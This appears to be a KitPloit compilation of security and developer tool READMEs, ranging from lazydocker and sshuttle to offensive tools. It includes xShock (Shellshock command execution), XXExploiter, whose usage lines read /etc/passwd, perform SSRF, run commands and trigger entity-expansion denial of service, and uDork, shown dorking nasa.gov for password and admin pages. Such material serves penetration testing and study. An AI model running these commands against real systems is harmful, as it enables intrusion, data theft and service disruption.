KitPloit - PenTest Tools!

A simple terminal UI for both docker and docker-compose, written in Go with the gocui library.

Minor rant incoming: Something's not working? Maybe a service is down. docker-compose ps. Yep, it's that microservice that's still buggy. No issue, I'll just restart it: docker-compose restart. Okay now let's try again. Oh wait the issue is still there. Hmm. docker-compose ps. Right so the service must have just stopped immediately after starting. I probably would have known that if I was reading the log stream, but there is a lot of clutter in there from other services. I could get the logs for just that one service with docker compose logs --follow myservice but that dies everytime the service dies so I'd need to run that command every time I restart the service. I could alternatively run docker-compose up myservice and in that terminal window if the service is down I could just up it again, but now I've got one service hogging a terminal window even after I no longer care about its logs. I guess when I want to reclaim the terminal realestate I can do ctrl+P,Q, but... wait, that's not working for some reason. Should I use ctrl+C instead? I can't remember if that closes the foreground process or kills the actual service.
What a headache!
Memorising docker commands is hard. Memorising aliases is slightly less hard. Keeping track of your containers across multiple terminal windows is near impossible. What if you had all the information you needed in one terminal window with every common command living one keypress away (and the ability to add custom commands as well). Lazydocker's goal is to make that dream a reality.

Demo

Requirements

Docker >= 1.13 (API >= 1.25)
Docker-Compose >= 1.23.2 (optional)

Installation

Homebrew
Normally lazydocker formula can be found in the Homebrew core but we suggest you to tap our formula to get frequently updated one. It works with Linux, too.
Tap:

brew install jesseduffield/lazydocker/lazydocker

Core:

brew install lazydocker

Scoop (Windows)
You can install lazydocker using scoop:

scoop install lazydocker

Binary Release (Linux/OSX/Windows)
You can manually download a binary release from the release page.
Automated install/update, don't forget to always verify what you're piping into bash:

curl https://raw.githubusercontent.com/jesseduffield/lazydocker/master/scripts/install_update_linux.sh | bash

Go
Required Go version >= 1.8

go get github.com/jesseduffield/lazydocker

Arch Linux AUR
You can install lazydocker using your AUR package manager of choice or by running:

git clone https://aur.archlinux.org/lazydocker.git ~/lazydocker
cd ~/lazydocker
makepkg --install

A development version of the AUR package is also available

Docker

Click if you have an ARM device

If you have a ARM 32 bit v6 architecture

docker build -t lazyteam/lazydocker \
--build-arg BASE_IMAGE_BUILDER=arm32v6/golang \
--build-arg GOARCH=arm \
--build-arg GOARM=6 \
https://github.com/jesseduffield/lazydocker.git

If you have a ARM 32 bit v7 architecture

docker build -t lazyteam/lazydocker \
--build-arg BASE_IMAGE_BUILDER=arm32v7/golang \
--build-arg GOARCH=arm \
--build-arg GOARM=7 \
https://github.com/jesseduffield/lazydocker.git

If you have a ARM 64 bit v8 architecture

docker build -t lazyteam/lazydocker \
--build-arg BASE_IMAGE_BUILDER=arm64v8/golang \
--build-arg GOARCH=arm64 \
https://github.com/jesseduffield/lazydocker.git

Run the container

docker run --rm -it -v \
/var/run/docker.sock:/var/run/docker.sock \
-v /yourpath:/.config/jesseduffield/lazydocker \
lazyteam/lazydocker

Don't forget to change /yourpath to an actual path you created to store lazydocker's config
You can also use this docker-compose.yml

You might want to create an alias, for example:

echo "alias lzd='docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock -v /yourpath/config:/.config/jesseduffield/lazydocker lazyteam/lazydocker'" >> ~/.zshrc

For development, you can build the image using:

git clone https://github.com/jesseduffield/lazydocker.git
cd lazydocker
docker build -t lazyteam/lazydocker \
    --build-arg BUILD_DATE=`date -u +"%Y-%m-%dT%H:%M:%SZ"` \
    --build-arg VCS_REF=`git rev-parse --short HEAD` \
    --build-arg VERSION=`git describe --abbrev=0 --tag` \
    .

If you encounter a compatibility issue with Docker bundled binary, try rebuilding the image with the build argument --build-arg DOCKER_VERSION="v$(docker -v | cut -d" " -f3 | rev | cut -c 2- | rev)" so that the bundled docker binary matches your host docker binary version.

Usage
Call lazydocker in your terminal. I personally use this a lot so I've made an alias for it like so:

echo "alias lzd='lazydocker'" >> ~/.zshrc

(you can substitute .zshrc for whatever rc file you're using)

Basic video tutorial here.
List of keybindings here.

Cool features
everything is one keypress away (or one click away! Mouse support FTW):

viewing the state of your docker or docker-compose container environment at a glance
viewing logs for a container/service
viewing ascii graphs of your containers' metrics so that you can not only feel but also look like a developer
customising those graphs to measure nearly any metric you want
attaching to a container/service
restarting/removing/rebuilding containers/services
viewing the ancestor layers of a given image
pruning containers, images, or volumes that are hogging up disk space

FAQ

How do I edit my config?
By opening lazydocker, clicking on the 'project' panel in the top left, and pressing 'o' (or 'e' if your editor is vim). See Config Docs

How do I get text to wrap in my main panel?
In the future I want to make this the default, but for now there are some CPU issues that arise with wrapping. If you want to enable wrapping, use gui.wrapMainPanel: true

How do you select text?
Because we support mouse events, you will need to hold option while dragging the mouse to indicate you're trying to select text rather than click on something. Alternatively you can disable mouse events via the gui.ignoreMouseEvents config value.
Mac Users: See Issue #190 for other options.

Why can't I see my container's logs?
By default we only show logs from the last hour, so that we're not putting too much strain on the machine. This may be why you can't see logs when you first start lazydocker. This can be overwritten in the config's commandTemplates
If you are running lazydocker in Docker container, it is a know bug, that you can't see logs or CPU usage.

Alternatives

docui - Skanehira beat me to the punch on making a docker terminal UI, so definitely check out that repo as well! I think the two repos can live in harmony though: lazydocker is more about managing existing containers/services, and docui is more about creating and configuring them.
Portainer - Portainer tries to solve the same problem but it's accessed via your browser rather than your terminal. It also supports docker swarm.

Download Lazydocker

As far as I know, sshuttle is the only program that solves the following common case:

Your client machine (or router) is Linux, FreeBSD, or MacOS.
You have access to a remote network via ssh.
You don't necessarily have admin access on the remote network.
The remote network has no VPN, or only stupid/complex VPN protocols (IPsec, PPTP, etc). Or maybe you are the admin and you just got frustrated with the awful state of VPN tools.
You don't want to create an ssh port forward for every single host/port on the remote network.
You hate openssh's port forwarding because it's randomly slow and/or stupid.
You can't use openssh's PermitTunnel feature because it's disabled by default on openssh servers; plus it does TCP-over-TCP, which has terrible performance.

Obtaining sshuttle

Debian stretch or later:
```
apt-get install sshuttle
```
Arch Linux:
```
pacman -S sshuttle
```
Fedora:
```
dnf install sshuttle
```
NixOS:
```
nix-env -iA nixos.sshuttle
```
From PyPI:
```
sudo pip install sshuttle
```

Clone:

git clone https://github.com/sshuttle/sshuttle.git
cd sshuttle
sudo ./setup.py install

FreeBSD:

# ports
cd /usr/ports/net/py-sshuttle && make install clean
# pkg
pkg install py36-sshuttle

It is also possible to install into a virtualenv as a non-root user.

From PyPI:

virtualenv -p python3 /tmp/sshuttle
. /tmp/sshuttle/bin/activate
pip install sshuttle

Clone:

virtualenv -p python3 /tmp/sshuttle
. /tmp/sshuttle/bin/activate
git clone https://github.com/sshuttle/sshuttle.git
cd sshuttle
./setup.py install

Homebrew:
```
brew install sshuttle
```
Nix:
```
nix-env -iA nixpkgs.sshuttle
```

Documentation
The documentation for the stable version is available at: https://sshuttle.readthedocs.org/
The documentation for the latest development version is available at: https://sshuttle.readthedocs.org/en/latest/

Download Sshuttle

Chepy is a python library with a handy cli that is aimed to mirror some of the capabilities of CyberChef. A reasonable amount of effort was put behind Chepy to make it compatible to the various functionalities that CyberChef offers, all in a pure Pythonic manner. There are some key advantages and disadvantages that Chepy has over Cyberchef. The Cyberchef concept of stacking different modules is kept alive in Chepy.
There is still a long way to go for Chepy as it does not offer every single ability of Cyberchef.

Docs
Refer to the docs for full usage information

Example
For all usage and examples, see the docs.
Chepy has a stacking mechanism similar to Cyberchef. For example, this in Cyberchef:

This is equivalent to

from chepy import Chepy

file_path = "/tmp/demo/encoding"

print(
    Chepy(file_path)
    .load_file()
    .reverse()
    .rot_13()
    .base64_decode()
    .base32_decode()
    .hexdump_to_str()
    .o
)

Chepy vs Cyberchef

Advantages

Chepy is pure python with a supporting and accessible python api
Chepy has a CLI
Chepy CLI has full autocompletion.
Supports pe, elf, and other various file format specific parsing.
Extendable via plugins
Infinitely scalable as it can leverage the full Python library.
Chepy can interface with the full Cyberchef web app to a certain degree. It is easy to move from Chepy to Cyberchef if need be.
The Chepy python library is significantly faster than the Cyberchef Node library.
Works with HTTP/S requests without CORS issues.

Disadvantages

Chepy is not a web app (at least for now).
Chepy does not offer every single thing that Cyberchef does
Chepy does not have the magic method (at the moment)

Installation
Chepy can be installed in a few ways.

Pypi

pip3 install chepy
# optionally with extra requirements
pip3 install chepy[extras]

Git

git clone --recursive https://github.com/securisec/chepy.git
cd chepy
pip3 install -e .
# I use -e here so that if I update later with git pull, I dont have it install it again (unless dependencies have changed)

Docker

docker run --rm -ti -v $PWD:/data securisec/chepy "some string" [somefile, "another string"]

Standalone binary
One can build Chepy to be a standalone binary also. This includes packaging all the dependencies together.

git clone https://github.com/securisec/chepy.git
cd chepy
pip install .
pip install pyinstaller
pyinstaller cli.py --name chepy --onefile

The binary will be in the dist/ folder.

Plugins
Check here for plugins docs

.. toctree::     :maxdepth: 3     :caption: Contents:       usage.md     examples.md     cli.rst     chepy.md     core.md     modules.rst     extras.rst     plugins.md     pullrequest.md     config.md     faq.md      Indices and tables  ==================    * :ref:`genindex`  * :ref:`modindex`  * :ref:`search`

Download Chepy

xShock ShellShock (CVE-2014-6271)
This tool exploits shellshock.

Written by Hulya Karabag
Version 1.0.0
Instagram: Capture the Root

Screenshots

How to use

Read Me
All founded directories will be saved in vulnurl.txt file. The results of the executed commands are saved in response.txt.

Features
This tool include:

CGI VULNERABILITY
DIRECTORY SCAN
RUN COMMAND WITH FOUNDED CGI
SHOW VULNERABLE URLS
UPDATE PROXY

Installation

Installation with requirements.txt

git clone https://github.com/capture0x/xShock/
cd xShock
pip3 install -r requirements.txt

Usage

python3 main.py

CGI VULNERABILITY
Checks cgi-bin directory on the target site
e.g:

http://targetsite.com

DIRECTORY SCAN
This works with wordlists. Scans url on the target site. Important notice: Please enter full path of wordlist after the url.(Not file. It should be directory)
e.g: http:// targetsite.com/cgi-bin/selectedworlist
e.g:

http://targetsite.com/cgi-bin
/usr/share/wordlists/dirb  --> This is directory of wordlist. Not file!

RUN COMMAND WITH FOUNDED CGI
By entering the url in the vuln.txt file, you can try running commands in the found urls.

http://targetsite.com/cgi-bin/status

SHOW VULNERABLE URLS
Shows founded urls in vuln.txt file.

UPDATE PROXY
You can update proxies from web manually.

Known Issues
--

Bugs and enhancements
For bug reports or enhancements, please open an issue here.

Support and Donations
Contact us with email capture0x@mail.com.tr
Copyright 2020

Download XSHOCK

InstaSave is a python script to download images, videos & profile pictures from Instagram without any API access.

Features

Download Instagram Photos
Download Instagram Videos
Download Instagram Profile Pictures

Git Installation

# clone the repo
$ git clone https://github.com/sameera-madushan/InstaSave.git

# change the working directory to InstaSave
$ cd InstaSave

# install the requirements
$ pip3 install -r requirements.txt

Usage

python instasave.py

For your Attention
If you are downloading copyrighted content you should respect author's rights and use the content either for personal purposes or for non-commercial needs with proper mention and authorisation from the author.

Download InstaSave

OWASP Maryam is an Open-source intelligence(OSINT) and Web-based Footprinting modular/tool framework based on the Recon-ng and written in Python. If you have skill in Metasploit or Recon-ng, you can easily use it without prerequisites. And if not, please read the Quick Guide.

What can be done
If you want

Extracts Emails, Docs, Subdomains, Social networks from search engines
Extracts Links, CSS and JS files, CDN links, Emails, Keywords from Web Source
Find and Brute force DNS, TLD and important directs
Crawl Web Pages and search your RegExp
Identify WebApps, WAF, Interesting and important files
And get report with several format

Use Maryam

links

OWASP

Wiki

Install

Modules Guide
Bugs, requests, or any other issues please Contact me

Download Maryam

I wrote this tool to help me testing XXE vulnerabilities.
It generates the XML payloads, and automatically starts a server to serve the needed DTD's or to do data exfiltration.
IMPORTANT: This tool is still under development and although most of its features are already working, some may have not been tested properly.

Building & Running
This is a simple Node application written with typescript. So you can build it as you build other apps:
(install node and npm first, if you dont have them)

npm install  
npm run build  
#you may need to npm install tsc -g in order for 'npm build' to success

To run the app you can do it with one of two ways:

npm start [args]  
node dist/index.js [args]

Again, this is still under development. Soon i'll deploy the npm package to you can install it globally.

Usage

Usage: index.js [command] [options]  

Commands:  
  index.js file [file_to_read]  Use XXE to read a file  
  index.js request [URL]        Use XXE to do a request  
  index.js expect [command]     Use XXE to execute a command through PHP's  
                                expect  
  index.js xee [expantions]     Generate a huge content by resolving entities  

Options:  
  --version       Show version number                                    
  -s, --server    Server address for OOB and DTD  
  -p, --port      Server port for OOB. Default: 7777  
  -t, --template  path to an XML template where to inject payload
  -m, --mode      Extraction Mode: xml, oob, cdata. Default: xml  
  -e, --encode    Extraction Encoding: none, phpbase64. Default: none  
  -o, --output    Output for the XML payload file. Default is to console  
  -x              Use a request to automatically send the xml file  
  -h, --help      Show help                                              

Examples:  
  index.js expect ls  
  index.js -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml  
  index.js -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob  
  index.js xee 900000000 -o output.xml  
  index.js file /etc/passwd -x request.txt -t template.xml  

Extra Info:  
  - When using the xml or cdata modes, add the placeholder '{{XXE}}' in the  
  field where you want the entity content to be injected  
  - When specifiying file paths for windows the format should be as:  
  /c:/windows/win.ini (Notice the first slash).  
  - OOB: Out Of Bo   und: You can use this option to send the data processed by the  
  xml parser, to your local webserver. Usefull with blind attacks  
  - When using XML mode, it may break the XML parsing if XML reserved characters  
  are loaded  
  - When using the request option, you can specify the placeholder to inject the  
  payload with {{XXE}} or {{XXE_B64}}

There are basically 4 main commands:

file - to read local files
request - do SSRF attack, to make requests from the target machine
expect - Use PHP expect to execute commands, if your target is a PHP app
XEE - Just do parameter expansions to try to cause a DOS.

Some notes:
If you choose to use OOB or CDATA mode, XXExploiter will generate the necessary dtd to be included, and will start a server to host them. Have in mind that if you use these options you should set the server address
If you include content in the body of the XML have in mind that XML restricted characters like '<' may break the parsing so be sure to use CDATA or PHP's base64encode
Most of languages limit the number of entity expantions, or the total length of the content expanded, so make sure you test XEE on your machine first, with the same conditions as the target

Template
Sometimes we need to send XML with specific fields to be able to exploit a vulnerability. So in order to help, I've introduced the -t (--template) option.
You can create a regular XML file to be used to generate the malicious payload.
If you want to add the content of a request or a file read in the content of this file, you can place the placeholder {{XXE}} where you want that to be.
There may be some limitations right now with this option, if you send an XML template with a DOCTYPE field.

Request
After all this automation it would be boring to have to manually send the XML file to the server right?
Yeah, so I created a really nice option (-x) to automatically do it for you.
You can use a request that you grab for example from Burp, and use it here. (Note that the -x options wants a file)
In the place where you want the XML content to be injected you can add the placeholder {{XXE}} or if you need it encoded in b64 (yeah, i needed it once) use {{XXE_B64}}

Download Xxexploiter

uDork is a script written in Python that uses advanced Google search techniques to obtain sensitive information in files or directories, find IoT devices, detect versions of web applications, and so on.
uDork does NOT make attacks against any server, it only uses predefined dorks and/or official lists from exploit-db.com (Google Hacking Database: https://www.exploit-db.com/google-hacking-database).

Author: M3n0sD0n4ld
Twitter: @David_Uton

You need to have goop installed

pip3 install goop

Download and install:

$ git clone https://github.com/m3n0sd0n4ld/uDork
$ cd uDork
- Open the file and write inside this line:

cookie = 'YOUR FACEBOOK COOKIES HERE'

$ python3 uDork.py -h

Important!!!

For the tool to work, you must configure uDork with your Facebook cookie in the file cookie.py.
You must also be logged in to Facebook on the computer you are using uDork WITHOUT logging out.

Steps to obtain the cookie and configure the cookie

Login to facebook.com
Press in your browser control + shift + K (Firefox) o control + shift + J (Google Chrome) to go to console.
Write document.cookie in the console and copy the cookies "c_user = content" and "xs = content" to the variable "cookie" inside the file "cookie.py""

cookie = 'c_user=XXXXXX; xs=XXXXXX'

Note: If the "xs" cookie does not appear, follow these steps.

Save and remember, you must NOT log out of Facebook or you will have to do these steps again.

Use:

Menu

$ python3 uDork.py -h
       _____             _    
      |  __ \           | |   
 _   _| |  | | ___  _ __| | __
| | | | |  | |/ _ \| '__| |/ /
| |_| | |__| | (_) | |  |   < 
 \__,_|_____/ \___/|_|  |_|\_\ v.2020.03.13
  by M3n0sD0n4ld - (@David_Uton)

----------------------------------------------------------------------------------------------------
usage: uDork.py [-h] [-d DOMAIN] [-e EXTENSION] [-t TEXT] [-s STRING]
                [-m MASSIVE] [-l LIST] [-f FILE] [-k DORK] [-p PAGES]
                [-o OUTPUT]

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Domain or IP address.
  -e EXTENSION, --extension EXTENSION
                        Search files by extension. Use 'all' to find the list
                        extension.
  -t TEXT, --text TEXT  Find text in website content.
  -s STRING, --   string STRING
                        Locate text strings within the URL.
  -m MASSIVE, --massive MASSIVE
                        Attack a site with a predefined list of dorks. Review
                        list <-l / - list>
  -l LIST, --list LIST  Shows the list of predefined dorks (Exploit-DB).
  -f FILE, --file FILE  Use your own personalized list of dorks.
  -k DORK, --dork DORK  Specifies the type of dork <filetype | intext | inurl>
                        (Required for '<-f / - file'>).
  -p PAGES, --pages PAGES
                        Number of pages to search in Google. (By default 5
                        pages).
  -o OUTPUT, --output OUTPUT
                        Export results to a file.

Example of searching pdf files

$ python3 uDork.py -d nasa.gov -e pdf

       _____             _    
      |  __ \           | |   
 _   _| |  | | ___  _ __| | __
| | | | |  | |/ _ \| '__| |/ /
| |_| | |__| | (_) | |  |   < 
 \__,_|_____/ \___/|_|  |_|\_\ v.2020.03.13
  by M3n0sD0n4ld - (@David_Uton)

----------------------------------------------------------------------------------------------------
[!] The results will appear below. This may take several minutes, please wait ...
----------------------------------------------------------------------------------------------------
Domain/IP: nasa.gov
Find links with: pdf
----------------------------------------------------------------------------------------------------
https://www.sti.nasa.gov/thesvol2.pdf
https://www.sti.nasa.gov/thesvol1.pdf
https://www.nasa.gov/pdf/220260main_Workforce_Transition_Strategy_briefing   .pdf
https://oig.nasa.gov/docs/SAR0318.pdf
https://oig.nasa.gov/docs/FinalWrittenStatement_03_13_2013.pdf
https://oig.nasa.gov/docs/MC-2018.pdf
https://www.nasa.gov/centers/dryden/pdf/88798main_srfcs.pdf
https://www.nasa.gov/specials/apollo50th/pdf/A10_PressKit.pdf
https://www.nasa.gov/specials/apollo50th/pdf/A14_PressKit.pdf
https://www.nasa.gov/specials/apollo50th/pdf/A07_PressKit.pdf
https://www.nasa.gov/specials/apollo50th/pdf/A15_PressKit.pdf
https://www.nasa.gov/specials/apollo50th/pdf/A09_PressKit.pdf
https://www.nasa.gov/specials/apollo50th/pdf/A08_PressKit.pdf
https://www.nasa.gov/centers/dryden/pdf/88790main_Dryden.pdf
https://oig.nasa.gov/docs/MC-2017.pdf
....

Example of searching routes with the word "password"

$ python3 uDork.py -d nasa.gov -s password

       _____             _    
      |  __ \           | |   
 _   _| |  | | ___  _ __| | __
| | | | |  | |/ _ \| '__| |/ /
| |_| | |__| | (_) | |  |   < 
 \__,_|_____/ \___/|_|  |_|\_\ v.2020.03.13
  by M3n0sD0n4ld - (@David_Uton)

----------------------------------------------------------------------------------------------------
[!] The results will appear below. This may take several minutes, please wait ...
----------------------------------------------------------------------------------------------------
Domain/IP: nasa.gov
Find links with: password
----------------------------------------------------------------------------------------------------
https://www.grc.nasa.gov/its-training/best-practices/password-tips/
https://www.grc.nasa.gov/its-training/best-practices/password-rules/
htt   ps://www.nas.nasa.gov/hecc/support/kb/password-creation-rules_270.html
https://www.nas.nasa.gov/hecc/support/kb/index.php%3FView%3Dentry%26EntryID%3D270%26EntryTitle%3Dpassword-creation-rules%26mobile%3D0
https://open.nasa.gov/datanaut-accounts/password/reset/%3Fnext%3D/explore/datanauts/app/profile
https://www.nas.nasa.gov/hecc/support/kb/i-cant-log-inmy-password-is-not-workingmy-account-is-locked_5.html
https://www.nas.nasa.gov/hecc/support/kb/index.php%3FView%3Dentry%26EntryID%3D53%26EntryTitle%3Dtwo-step-connection-using-rsa-securid-passcode-and-nas-password%26mobile%3D0
https://www.nas.nasa.gov/hecc/support/kb/index.php%3FView%3Dentry%26EntryID%3D8%26EntryTitle%3Dwhat-are-the-requirements-for-creating-a-password%26mobile%3D0
https://oltaris.nasa.gov/password/new
https://ghrc.nsstc.nasa.gov/data-publication/user/password
https://answers.nssc.nasa.gov/app/answers/detail/a_id/6173/~/change-launchpad-%2528idmax%2529-password
https://answers.nssc.   nasa.gov/app/answers/list/search/1/kw/Password/search/1
https://answers.nssc.nasa.gov/app/answers/list/search/1/kw/CHANGE%2520NDC%2520PASSWORD/suggested/1
https://answers.nssc.nasa.gov/app/answers/detail/a_id/6174/~/reset-ndc-password
.....

Dorks listing

$ python3 uDork.py -l list

       _____             _    
      |  __ \           | |   
 _   _| |  | | ___  _ __| | __
| | | | |  | |/ _ \| '__| |/ /
| |_| | |__| | (_) | |  |   < 
 \__,_|_____/ \___/|_|  |_|\_\ v.2020.03.13
  by M3n0sD0n4ld - (@David_Uton)

----------------------------------------------------------------------------------------------------

 ======================== DORKS LISTING ========================
 admin : Access panels of all kinds (administration, login, CMS, ...)
 directories : Sensitive directories (drupal, wordpress, phpmyadmin ...)
usernames : Find files containing user names.
passwords : Find files that contain passwords   .
 webservers: Find web servers.
 vulnerable_files : Find vulnerable files. 
 vulnerable_servers : Find vulnerable servers.
 error_messages : Show error messages.
 vulnerable_networks : Find software data on vulnerable networks.
 portal_logins : List portal logins.
 devices :  Find connected devices (printers, webcams, thermostats, ...)

Example of use Dorks Massive

$ python3 uDork.py -d nasa.gov -m admin -p 3 -o report.txt

       _____             _    
      |  __ \           | |   
 _   _| |  | | ___  _ __| | __
| | | | |  | |/ _ \| '__| |/ /
| |_| | |__| | (_) | |  |   < 
 \__,_|_____/ \___/|_|  |_|\_\ v.2020.03.13
  by M3n0sD0n4ld - (@David_Uton)

----------------------------------------------------------------------------------------------------
[!] The results will appear below. This may take several minutes, please wait ...
----------------------------------------------------------------------------------------------------
Domain/IP: nasa.gov
Find links with: ADMIN/

https://asd.gsfc.nasa.gov/blueshift/index.php/author/admin/
https://lists.hq.nasa.gov/mailman/admin
https://lists.hq.nasa.gov/mailman/admin/LISTNAME
https://rosetta.jpl.nasa.gov/blogs/admin
https://dartslab.jpl.nasa.go   v/qa/user/admin
https://landsat.gsfc.nasa.gov/author/admin/page/8/
https://rosetta.jpl.nasa.gov/blogs/admin%3Fpage%3D1
https://www.nasa.gov/news/speeches/admin/mg_speech_collection_archive_4.html
https://dartslab.jpl.nasa.gov/qa/user/admin/answers
https://dartslab.jpl.nasa.gov/qa/user/admin/wall
https://landsat.gsfc.nasa.gov/author/admin/page/14/
....
----------------------------------------------------------------------------------------------------
Domain/IP: nasa.gov
Find links with: AdminTools/

https://kscddms.ksc.nasa.gov/adminTools.html
----------------------------------------------------------------------------------------------------
Domain/IP: nasa.gov
Find links with: Server.html

https://image.msfc.nasa.gov/ChrisDocs/udfLib/Server.html
https://www.nasa.gov/privacy/PIA-ODIN-server.html

MORE RESULTS...

Thanks:
Thank s0md3v for goop, very good job! https://github.com/s0md3v/goop

Download uDork

A browser extension that encrypts your communications with many websites that offer HTTPS but still allow unencrypted connections.

Getting Started
Get the packages you need and install a git hook to run tests before push:

bash install-dev-dependencies.sh

Run the ruleset validations and browser tests:

bash test.sh

Run the latest code and rulesets in a standalone Firefox profile:

bash test/firefox.sh --justrun

Run the latest code and rulesets in a standalone profile for a specific version of Firefox:

FIREFOX=/path/to/firefox bash test/firefox.sh --justrun

Run the latest code and rulesets in a standalone Chromium profile:

bash test/chromium.sh --justrun

Run the latest code and rulesets in a standalone Tor Browser profile:

bash test/tor-browser.sh path_to_tor_browser.tar.xz

Build the Firefox (.xpi) & Chromium (.crx) extensions:

bash make.sh

Both of the build commands store their output under pkg/.

Precommit Testing
One can run the available test suites automatically by enabling the precommit hook provided with:

ln -s ../../hooks/precommit .git/hooks/pre-commit

Source Tree
This is the source tree for HTTPS Everywhere for Firefox and Chrome.
Important directories you might want to know about

chromium/                 WebExtension source code (for Firefox & Chromium/chrome)
chromium/external         External dependencies
chromium/test             Unit tests

rules/                    Symbolic link to src/chrome/content/rules

src/chrome/content/rules  Ruleset files live here

test/                     Travis unit test source code live here

utils/                    Various utilities (includes some Travis test source)

Hacking on the Source Code
Please refer to our contributing document to contribute to the project.
This project is governed by EFF's Public Projects Code of Conduct.

Download Https-Everywhere

REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate this into CICD pipeline. Astra can take API collection as an input so this can also be used for testing apis in standalone mode.

SQL injection
Cross site scripting
Information Leakage
Broken Authentication and session management
CSRF (including Blind CSRF)
Rate limit
CORS misconfiguration (including CORS bypass techniques)
JWT attack
CRLF detection
Blind XXE injection

Roadmap
https://www.astra-security.info/roadmap/

Requirement

Linux or MacOS
Python 2.7
mongoDB

Installation

$ git clone https://github.com/flipkart-incubator/Astra

$ cd Astra

$ sudo pip install -r requirements.txt

Docker Installation

Run Mongo Container:

$ docker pull mongo
$ docker run --name astra-mongo -d mongo

Installing GUI Docker:

$ git clone https://github.com/flipkart-incubator/Astra.git
$ cd Astra
$ docker build -t astra .
$ docker run --rm -it --link astra-mongo:mongo -p 8094:8094 astra

Installing CLI Docker :

$ git clone -b docker-cli https://github.com/flipkart-incubator/Astra.git
$ cd Astra
$ docker build -t astra-cli .
$ docker run --rm -it --link astra-mongo:mongo astra-cli

Dependencies

- requests
- logger
- pymongo
- ConfigParser
- pyjwt
- flask
- sqlmap

Documentation
https://www.astra-security.info

Usage: CLI

$ python astra.py --help

                      _
        /\       | |
       /  \   ___| |_ _ __ __ _
      / /\ \ / __| __| '__/ _` |
     / ____ \__ \ |_| | | (_| |
    /_/    \_\___/\__|_|  \__,_|



usage: astra.py [-h] [-c {Postman,Swagger}] [-n COLLECTION_NAME] [-u URL]
                [-headers HEADERS] [-method {GET,POST}] [-b BODY]
                [-l LOGINURL] [-H LOGINHEADERS] [-d LOGINDATA]

REST API Security testing Framework

optional arguments:
  -h, --help            show this help message and exit
  -c {Postman,Swagger}, --collection_type {Postman,Swagger}
                        Type of API collection
  -n COLLECTION_NAME, --collection_name COLLECTION_NAME
                        Type of API collection
  -u URL, --url URL     URL of target API
  -headers HEADERS, --headers HEADERS
                        Custom headers.Example: {"token" : "123"}
  -met   hod {GET,POST}, --method {GET,POST}
                        HTTP request method
  -b BODY, --body BODY  Request body of API
  -l LOGINURL, --loginurl LOGINURL
                        URL of login API
  -H LOGINHEADERS, --loginheaders LOGINHEADERS
Headers should be in a dictionary format. Example:
                        {"accesstoken" : "axzvbqdadf"}
  -d LOGINDATA, --logindata LOGINDATA
                        login data of API

Usage: Web interface
Run the api.py and access the web interface at http://127.0.0.1:8094

$ cd API
$ python api.py

Screenshots

New scan

Scan Reports

Detailed Report

Lead Developer

Sagar Popat (@popat_sagar)

Credits

Ankur Bhargava
Harsh Grover
Flipkart security team
Pardeep Battu

Download Astra

Scoring Engine for Red/White/Blue Team Competitions

Getting started
Download Docker. If you are on Mac or Windows, Docker Compose will be automatically installed. On Linux, make sure you have the latest version of Compose. If you're using Docker for Windows on Windows 10 pro or later, you must also switch to Linux< /a> containers.
Run in this directory:

docker-compose build
docker-compose up

If you want to delete the database before starting, set the SCORINGENGINE_OVERWRITE_DB environment variable:

SCORINGENGINE_OVERWRITE_DB=true docker-compose up

We also provide the ability to run it in an 'example' mode. This means only the web ui runs, and the database is prepopulated with example data. Set the SCORINGENGINE_EXAMPLE environment variable to true:

SCORINGENGINE_EXAMPLE=true docker-compose up

The app will be running at http://localhost
Log in with any of the following logins at http://localhost:

whiteteamuser:testpass
team1user1:testpass
team2user1:testpass
team2user2:testpass
redteamuser:testpass

Documentation
https://scoringengine.readthedocs.io/en/latest/

Download Scoringengine

FinalRecon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be added with ease.

Features
FinalRecon provides detailed information such as :

Header Information
Whois
SSL Certificate Information
Crawler
DNS Enumeration
- A, AAAA, ANY, CNAME, MX, NS, SOA, TXT Records
- DMARC Records
Subdomain Enumeration
- Data Sources
  - BuffOver
  - crt.sh
  - ThreatCrowd
  - AnubisDB
  - ThreatMiner
Traceroute
- Protocols
  - UDP
  - TCP
  - ICMP
Directory Searching
Port Scan
- Fast
- Top 1000 Ports
- Open Ports with Standard Services
Export
- Formats
  - txt
  - xml
  - csv

Screenshots

Header Information

WHOIS

SSL Certificate Details

Found Flag in SSL Certificate - Securinets CTF Quals 2019 - Hidden (200 Points)

Crawler

DNS Enumeration

HackTheBox OSINT Challenge

Subdomain Enumeration

Traceroute

Directory Searching

Port Scan

Tested on

Kali Linux 2019.1
BlackArch Linux

Installation

git clone https://github.com/thewhiteh4t/FinalRecon.git
cd FinalRecon
pip3 install -r requirements.txt

Usage

python3 finalrecon.py -h

usage: finalrecon.py [-h] [--headers] [--sslinfo] [--whois] [--crawl] [--dns] [--sub] [--trace] [--dir] [--ps]
                     [--full] [-t T] [-T T] [-w W] [-r] [-s] [-d D] [-m M] [-p P] [-tt TT] [-o O]
                     url

FinalRecon - OSINT Tool for All-In-One Web Recon | v1.0.2

positional arguments:
  url         Target URL

optional arguments:
  -h, --help  show this help message and exit
  --headers   Header Information
  --sslinfo   SSL Certificate Information
  --whois     Whois Lookup
  --crawl     Crawl Target
  --dns       DNS Enumeration
  --sub       Sub-Domain Enumeration
  --trace     Traceroute
  --dir       Directory Search
  --ps        Fast Port Scan
  --full      Full Recon

Extra Options:
  -t T        Number of Threads [ Default : 50 ]
  -T T        Request Timeout [ Default : 10.0 ]
  -w W        Path t   o Wordlist [ Default : wordlists/dirb_common.txt ]
  -r          Allow Redirect [ Default : False ]
  -s          Toggle SSL Verification [ Default : True ]
  -d D        Custom DNS Servers [ Default : 1.1.1.1 ]
  -m M        Traceroute Mode [ Default : UDP ] [ Available : TCP, ICMP ]
  -p P        Port for Traceroute [ Default : 80 / 33434 ]
  -tt TT      Traceroute Timeout [ Default : 1.0 ]
  -o O        Export Output [ Default : txt ] [ Available : xml, csv ]

# Check headers

python3 finalrecon.py --headers <url>

# Check ssl Certificate

python3 finalrecon.py --sslinfo <url>

# Check whois Information

python3 finalrecon.py --whois <url>

# Crawl Target

python3 finalrecon.py --crawl <url>

# full scan

python3 finalrecon.py --full <url>

Demo

